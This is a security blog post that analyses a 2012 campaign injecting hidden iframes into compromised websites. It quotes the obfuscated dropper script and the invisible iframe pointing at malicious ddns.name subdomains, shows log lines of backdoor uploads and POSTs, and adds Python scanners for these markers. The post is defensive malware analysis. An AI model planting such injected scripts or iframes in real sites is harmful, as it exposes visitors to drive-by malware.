Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Script Injection (*.ddns.name) and Backdoors

   12 Feb 12   Filed in Short Attack Reviews

Just a quick review of a hacker attack that I came across this week.

The attackers inject a malicious script into legitimate web pages on compromised sites and update the script several times a day (sometimes they change the script code, and sometimes they just make sure the script is still there in case webmasters removed it). A typical script looks like this:

var $E=(Date);if($E){$f=['2*%0)%5}%1','%3{%b(%9_%8...skipped...(1))[$s.$Aj]($l[$0][$s.$1k](0,1));}}return this;},$3=$l(),$f='';$pi('l\x65\x6E\x67th');if ((Number)&&(Array)&&(Function)&&(String)&&(Image)){if(document.getElementsByTagName('s cript').length > 0){document.wr ite('<i frame src="'+document.getElementById('____Uy').innerHTML+'" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>');}}

The scripts create invisible iframes that load malicious content from subdomains of ddns.name (ddns.name is a free dynamic DNS service). E.g.

<i frame src="hxxp://npputdzykop .ddns .name/index.php?showtopic=892380" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>

hxxp://bacmdmrnxdf .ddns .name/index.php?showtopic=892380
hxxp://hjuusnhqspt .ddns .name/index.php?showtopic=892380
hxxp://kmkyqilckhi .ddns .name/index.php?showtopic=892380
hxxp://npputdzykop .ddns .name/index.php?showtopic=892380
hxxp://jnobuznhccv .ddns .name/index.php?showtopic=892380

Last time I checked, the malicious subdomains pointed to 37.59.74.146.
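The injected script and the iframe it writes carry a few stable markers: a `src` on a `*.ddns.name` subdomain, the off-screen `position: fixed; ... top:-1000px; visibility: hidden` style, the `____Uy` element that holds the URL, and the `document.write('<iframe` dropper. The scanner below is an added example (not the Unmask Parasites tool or the post's own code) that checks web files for those markers and flags files whose names contain "index" or "default", which this campaign targets. The regexes, the sample snippets and the `demo()` directory layout are my own assumptions, constructed for illustration.

```python
"""Scan web files for the hidden ddns.name iframe injection (added example)."""
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# Markers taken from the injected script/iframe shown above. The regexes
# are assumptions about how to match them, not a published signature.
INDICATORS = {
    "ddns_name_iframe": re.compile(
        r"<iframe[^>]+src\s*=\s*['\"]https?://[a-z0-9.-]+\.ddns\.name/", re.I),
    "offscreen_hidden_style": re.compile(
        r"position:\s*fixed;[^\"']*top:\s*-\d{3,}px;[^\"']*visibility:\s*hidden", re.I),
    "hidden_src_holder": re.compile(r"getElementById\(\s*['\"]____Uy['\"]\s*\)"),
    "document_write_iframe": re.compile(r"document\.write\(\s*['\"]<iframe", re.I),
}

SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js")


def scan_text(text: str) -> list[str]:
    """Return the sorted names of every indicator found in the text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_priority_name(filename: str) -> bool:
    """Files the post says this campaign infects: names containing index/default."""
    lower = filename.lower()
    return "index" in lower or "default" in lower


def scan_tree(root: str | os.PathLike) -> dict[str, list[str]]:
    """Walk a document root; map each relative path to the indicators it matches."""
    root = Path(root)
    hits: dict[str, list[str]] = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXTENSIONS:
            continue
        found = scan_text(path.read_text(errors="ignore"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits


# Constructed samples (not the post's real subdomains): the dropper fragment,
# the iframe it renders, and a clean file.
SAMPLE_SCRIPT = (
    "document.write('<iframe src=\"'+document.getElementById('____Uy').innerHTML"
    "+'\" style=\"position: fixed; left:100px; top:-1000px; visibility: hidden;\"></iframe>');"
)
SAMPLE_IFRAME = (
    '<iframe src="http://constructed-sample.ddns.name/index.php?showtopic=0" '
    'style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>'
)
SAMPLE_CLEAN = '<?php get_header(); ?><iframe src="https://example.com/embed" width="300"></iframe>'


def demo() -> dict[str, list[str]]:
    """Build a throwaway document root with one infected and one clean file, then scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "index.php").write_text("<?php echo 'hi'; ?>\n" + SAMPLE_IFRAME)
        Path(tmp, "header.php").write_text(SAMPLE_CLEAN)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, found in demo().items():
        flag = " (priority name)" if is_priority_name(Path(rel).name) else ""
        print(f"{rel}{flag}: {', '.join(found)}")
```

Run it against a real document root with `scan_tree("/path/to/public_html")`; a hit on `offscreen_hidden_style` alone is worth a manual look even when the `ddns.name` host has changed, because the attackers rotate subdomains far more often than they rotate the iframe styling.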

When Google detects such malware on websites, you will see the following (or similar) messages on Safe Browsing diagnostic pages:

Malicious software is hosted on 7 domain(s), including hyyjkhfgmxk .ddns .name/, google-‐analytics .com/, kmkyqilckhi.ddns.name/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including google‐‐analytics .com/

Access log analysis

I had a chance to analyze access logs of one of the infected sites. Here’s what I found there:

During 24 hours, IP address 81.17.24.72 made 842 successful (response code 200) POST requests to backdoor files in 142 different locations on that server.

Some malicious requests:

81.17.24.72 - - [08/Feb/2012:16:11:37 -0500] "POST /e9a3.php HTTP/1.1" 200 41869 "-" "-"
81.17.24.72 - - [08/Feb/2012:17:45:12 -0500] "POST /e9a3.php HTTP/1.1" 200 460 "-" "-"
81.17.24.72 - - [09/Feb/2012:09:56:36 -0500] "POST /tmp/9ef4.php HTTP/1.1" 200 22467 "-" "-"
81.17.24.72 - - [09/Feb/2012:10:04:21 -0500] "POST /...skipped.../images/9ef4.php HTTP/1.1" 200 22491 "-" "-"
81.17.24.72 - - [09/Feb/2012:10:09:02 -0500] "POST /...skipped.../includes/admin/9ef4.php HTTP/1.1" 200 22499 "-" "-"
81.17.24.72 - - [09/Feb/2012:10:07:29 -0500] "POST /...skipped.../modules/9ef4.php HTTP/1.1" 200 22492 "-" "-"
81.17.24.72 - - [09/Feb/2012:12:30:13 -0500] "POST /public_html/...skipped.../wp-content/9ef4.php HTTP/1.1" 200 22484 "-" "-"
81.17.24.72 - - [09/Feb/2012:12:35:29 -0500] "POST //public_html/...skipped.../wp-includes/9ef4.php HTTP/1.1" 200 22507 "-" "-"
81.17.24.72 - - [09/Feb/2012:12:37:59 -0500] "POST /public_html/...skipped.../cgi-bin/9ef4.php HTTP/1.1" 200 22488 "-" "-"
81.17.24.72 - - [09/Feb/2012:13:01:09 -0500] "POST /public_html/...skipped.../wp-admin/9ef4.php HTTP/1.1" 200 22503 "-" "-"

Resolving the issue

As you can see, it is not enough to remove malicious scripts from legitimate files. To prevent reinfection, you should also find and delete all backdoor files.

In this particular case, you might also want to block the IP 81.17.24.72. Most control panels provide an option to block requests from specific IPs. Alternatively, if you use Apache, you might want to add the following lines to the topmost .htaccess file:

order allow,deny
deny from 81.17.24.72
allow from all

Finding the security hole

Actually, to stop this attack completely, you should figure out how the attacker managed to upload the backdoor files to your server in the first place. Unfortunately, I didn’t have access to historical logs of the compromised sites and couldn’t trace the beginning of the attack. If your site is affected by this hack and you have access logs for the last 2-4 weeks, I would love to hear from you.

At this point, I can suggest that you update all software on your server (including themes, plugins and components) and change all passwords. And don’t forget to regularly scan your server for suspicious content.

Update (Feb 16, 2012): I’ve managed to get FTP logs of the compromised site and now I’m confident that this attack uses stolen FTP credentials.

Here are some of the most representative lines from the logs:

...
Sun Feb 12 10:04:54 2012 0 81.17.24.72 2280 /home/username/db21.php b _ i r username ftp 1 * c
Sun Feb 12 10:27:58 2012 0 81.17.24.72 2280 /home/username/.autorespond/ca82.php b _ i r intern64 ftp 1 * c
Sun Feb 12 11:01:23 2012 0 81.17.24.72 2280 /home/username/.cpaddons/f041.php b _ i r username ftp 1 * c
Sun Feb 12 11:29:42 2012 0 81.17.24.72 2280 /home/username/.cpanel/a473.php b _ i r username ftp 1 * c
Sun Feb 12 11:54:51 2012 0 81.17.24.72 2280 /home/username/.htpasswds/3009.php b _ i r username ftp 1 * c
Sun Feb 12 12:41:48 2012 0 81.17.24.72 2280 /home/username/.trash/0fc4.php b _ i r username ftp 1 * c
Sun Feb 12 13:22:50 2012 0 81.17.24.72 2280 /home/username/cgi-bin/9e35.php b _ i r username ftp 1 * c
Sun Feb 12 13:58:39 2012 0 81.17.24.72 2280 /home/username/c7b0.php b _ i r username ftp 1 * c
...
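The two log analyses in this post (the 842 POST requests to backdoors in 142 locations in the access log, and the FTP uploads of the same kind of files by the same IP in the xferlog) are exactly what a short script can do for you on a larger site. The example below is added here and is not the post's own tooling: it parses Apache combined-format access log lines and standard xferlog lines, summarises successful POSTs to PHP files per client IP, lists completed FTP uploads of PHP files and .htaccess, and reports files that were uploaded over FTP and then POSTed to over HTTP by the same IP. The log lines are constructed samples using TEST-NET addresses, and the `DOCROOT` mapping from FTP home to web root is an assumption you would adjust for your own host.

```python
"""Correlate xferlog uploads with access-log POSTs (added example, constructed data)."""
from __future__ import annotations

import re
from collections import defaultdict

# Apache "combined" format: ip ident user [time] "METHOD path proto" status size "referer" "ua"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Uploads worth flagging: PHP code or an .htaccess file
SUSPICIOUS_UPLOAD = re.compile(r"\.(?:php\d?|phtml)$|/\.htaccess$", re.I)
# Assumption: this is where the FTP account's web root lives
DOCROOT = "/home/username/public_html"


def normalize_path(raw: str) -> str:
    """Drop the query string and collapse '//' so one file has one key."""
    return re.sub(r"/+", "/", raw.split("?", 1)[0])


def parse_access_line(line: str) -> dict | None:
    m = ACCESS_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = normalize_path(rec["path"])
    rec["status"] = int(rec["status"])
    return rec


def parse_xferlog_line(line: str) -> dict | None:
    """xferlog fields: date(5) xfer-time host size file type special direction mode user svc auth uid status."""
    t = line.split()
    if len(t) < 18:
        return None
    return {"host": t[6], "path": t[8], "direction": t[11], "user": t[13], "status": t[17]}


def summarize_posts(lines) -> dict[str, dict]:
    """Per client IP: successful (200) POSTs to .php files, distinct paths, blank referer+UA count."""
    per_ip = defaultdict(lambda: {"requests": 0, "paths": set(), "blank_referer_ua": 0})
    for line in lines:
        r = parse_access_line(line)
        if not r or r["method"] != "POST" or r["status"] != 200:
            continue
        if not r["path"].lower().endswith(".php"):
            continue
        s = per_ip[r["ip"]]
        s["requests"] += 1
        s["paths"].add(r["path"])
        if r["referer"] == "-" and r["ua"] == "-":
            s["blank_referer_ua"] += 1
    return {ip: {**s, "paths": sorted(s["paths"])} for ip, s in per_ip.items()}


def ftp_uploads(lines) -> dict[str, list[str]]:
    """Completed incoming transfers (direction 'i', status 'c') of suspicious files, per remote host."""
    per_host = defaultdict(set)
    for line in lines:
        r = parse_xferlog_line(line)
        if r and r["direction"] == "i" and r["status"] == "c" and SUSPICIOUS_UPLOAD.search(r["path"]):
            per_host[r["host"]].add(r["path"])
    return {h: sorted(p) for h, p in per_host.items()}


def correlate(ftp_lines, http_lines) -> list[tuple[str, str, int]]:
    """(ip, web path, POST count) for files an IP uploaded via FTP and then POSTed to over HTTP."""
    posts = defaultdict(int)
    for line in http_lines:
        r = parse_access_line(line)
        if r and r["method"] == "POST" and r["status"] == 200:
            posts[(r["ip"], r["path"])] += 1
    hits = []
    for host, paths in ftp_uploads(ftp_lines).items():
        for path in paths:
            if path.startswith(DOCROOT + "/"):
                web_path = path[len(DOCROOT):]
                if posts.get((host, web_path)):
                    hits.append((host, web_path, posts[(host, web_path)]))
    return sorted(hits)


# Constructed sample logs (TEST-NET IPs), shaped like the real lines in the post
HTTP_LOG = [
    '203.0.113.5 - - [08/Feb/2012:16:11:37 -0500] "POST /9ef4.php HTTP/1.1" 200 22467 "-" "-"',
    '203.0.113.5 - - [09/Feb/2012:12:30:13 -0500] "POST //wp-content/9ef4.php HTTP/1.1" 200 22484 "-" "-"',
    '203.0.113.5 - - [09/Feb/2012:12:35:29 -0500] "POST /wp-content/9ef4.php?x=1 HTTP/1.1" 200 460 "-" "-"',
    '198.51.100.7 - - [09/Feb/2012:12:40:00 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Feb/2012:12:41:10 -0500] "POST /wp-login.php HTTP/1.1" 302 0 "http://example.com/wp-login.php" "Mozilla/5.0"',
]
FTP_LOG = [
    "Sun Feb 12 10:04:54 2012 0 203.0.113.5 2280 /home/username/public_html/9ef4.php b _ i r username ftp 1 * c",
    "Sun Feb 12 10:27:58 2012 0 203.0.113.5 2280 /home/username/public_html/wp-content/9ef4.php b _ i r username ftp 1 * c",
    "Sun Feb 12 11:01:23 2012 1 203.0.113.5 9120 /home/username/public_html/.htaccess b _ i r username ftp 1 * c",
    "Mon Feb 13 09:12:00 2012 3 198.51.100.7 40210 /home/username/public_html/style.css a _ o r username ftp 1 * c",
    "Mon Feb 13 09:13:10 2012 0 203.0.113.5 2280 /home/username/public_html/images/9ef4.php b _ i r username ftp 1 * i",
]

if __name__ == "__main__":
    print(summarize_posts(HTTP_LOG))
    print(ftp_uploads(FTP_LOG))
    print(correlate(FTP_LOG, HTTP_LOG))
```

On a real server, feed `open("/var/log/apache2/access.log")` and `open("/var/log/xferlog")` (paths vary by distribution and panel) in place of the sample lists. The blank referer and user agent on every backdoor POST is a useful secondary signal: browsers almost always send a user agent, while this kind of scripted client sends neither.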

In the logs, we see the notorious IP address 81.17.24.72 uploading backdoor files to various directories on the server. Later, the same 81.17.24.72 IP uses HTTP POST requests to the uploaded backdoors to infect legitimate files. It currently infects files that have the following strings in their filenames: index, default.

Once your FTP credentials are stolen, they can be sold to multiple hacker groups. That’s why it’s quite typical that a few gangs try to exploit the same site at the same time. In this case, I found traces of a couple of different attacks that also used the FTP vector.

For example, IPs “91.121.137.14”, “91.121.91.142” and “74.208.132.83” routinely uploaded files “extra.php” and “frame_cleaner.php” and then requested them via HTTP GET.

198.66.254.199 appended some code to wp-blog-header.php.

216.183.83.126 injected cloaked spammy links into “header.php” of all WordPress themes and modified .htaccess files.

As you can see, many attacks use both stolen FTP credentials (to initially break into legitimate websites) and backdoor files (to control and reinfect websites even when webmasters change passwords). In this post, I showed how useful FTP and web server access logs can be to find security holes and malicious files.

Webmasters: do you have logs for your sites? If not, go and enable logging right now!

Your comments and any additional information are welcome.
